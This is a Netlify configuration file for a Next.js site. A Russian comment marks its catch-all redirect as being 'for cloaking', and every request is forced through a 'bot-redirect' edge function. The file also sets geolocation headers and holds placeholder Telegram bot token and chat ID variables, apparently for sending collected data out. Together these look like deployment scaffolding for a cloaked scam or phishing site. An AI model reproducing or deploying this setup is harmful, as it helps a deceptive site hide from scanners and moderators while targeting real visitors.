[build]
  command = "npm ci --legacy-peer-deps && npm run build"

[[plugins]]
  package = "@netlify/plugin-nextjs"

[images]
  remote_images = [
    "https://source.unsplash.com/.*",
    "https://images.unsplash.com/.*",
    "https://ext.same-assets.com/.*",
    "https://ugc.same-assets.com/.*"
  ]

[build.environment]
  TELEGRAM_BOT_TOKEN = "YOUR_BOT_TOKEN_HERE"
  TELEGRAM_CHAT_ID = "YOUR_CHAT_ID_HERE"
  NPM_FLAGS = "--legacy-peer-deps"
  NODE_VERSION = "18.18.0"
  NEXT_TELEMETRY_DISABLED = "1"
  NODE_OPTIONS = "--max-old-space-size=4096"

# Включаем геолокацию и заголовки страны
[[headers]]
  for = "/*"
  [headers.values]
    X-Country = "{{country}}"
    X-Language = "{{language}}"

# Edge Functions конфигурация
[functions]
  directory = "netlify/edge-functions"

# Редиректы для клоакинга
[[redirects]]
  from = "/*"
  to = "/.netlify/edge-functions/bot-redirect"
  status = 200
  force = true

# Пропускаем статические файлы
[[redirects]]
  from = "/_next/*"
  to = "/_next/:splat"
  status = 200

[[redirects]]
  from = "/api/*"
  to = "/api/:splat"
  status = 200

[[redirects]]
  from = "/static/*"
  to = "/static/:splat"
  status = 200

[[redirects]]
  from = "/favicon.ico"
  to = "/favicon.ico"
  status = 200

[[redirects]]
  from = "/robots.txt"
  to = "/robots.txt"
  status = 200

[[redirects]]
  from = "/sitemap.xml"
  to = "/sitemap.xml"
  status = 200
